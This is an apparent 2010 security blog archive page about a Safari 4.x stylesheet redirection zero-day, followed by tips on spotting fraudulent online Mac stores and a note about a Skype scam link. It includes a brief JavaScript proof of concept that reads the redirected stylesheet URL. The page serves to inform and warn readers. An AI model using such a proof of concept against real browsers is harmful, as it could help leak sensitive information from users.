Archive for January, 2010

Apple Safari Stylesheet Redirection vulnerability

There’s a 0-day vulnerability affecting Safari 4.x users, it’s not critical, but it is important to be aware of it.

<link rel="stylesheet" type="text/css" href="">
<script language="javascript">
setTimeout("alert(document.styleSheets[0].href)", 10000);
//setTimeout is used just to wait for page loading

Listing 01 – Apple Safari Stylesheet Redirection PoC

Cesar Cerrudo has discovered this vulnerability, and discussed that Safari wasn’t able to display the LINK specified in href value, instead it reads the stylesheets to redirect to a target URL.

Malicious user may take advantage of this vulnerability to steal sensitive information.

Be cautious when surfing the net!

This fraudulent site attempts to scam gullible Mac users.

Please be careful when shopping online. Here’s simple tips on how to detect suspicious vendors:

1) You can’t find sufficient details to verify  the store such as contact number and store location.

2) You can’t find interactive review. Static review such as “Testimonials” page can be easily crafted.

3)  Check DNS table of the IP address. Whois provides enough information for you to trace the people behind the suspicious website. In most cases, you’ll find association and history to various forms of fraudulent activities.

Best choice is to buy from known legitimate retailers and online stores. It may be costly, but it assures your online transaction is secured, provides buyer protection and guarantees satisfaction.

Engaging into fraudulent online deals could cause your identity and your money.

Stay safe!

Updated as of 15.01.2010

I received this message from Skype (below) which links to a very similar looking website. Of course, it’s a certified scam.

Malware Intelligence Report

“Crimeware 2009” extensive compilation of analysis, findings and intelligence  report  released in 262 pages, written by Jorge Mieres. [Refer this link]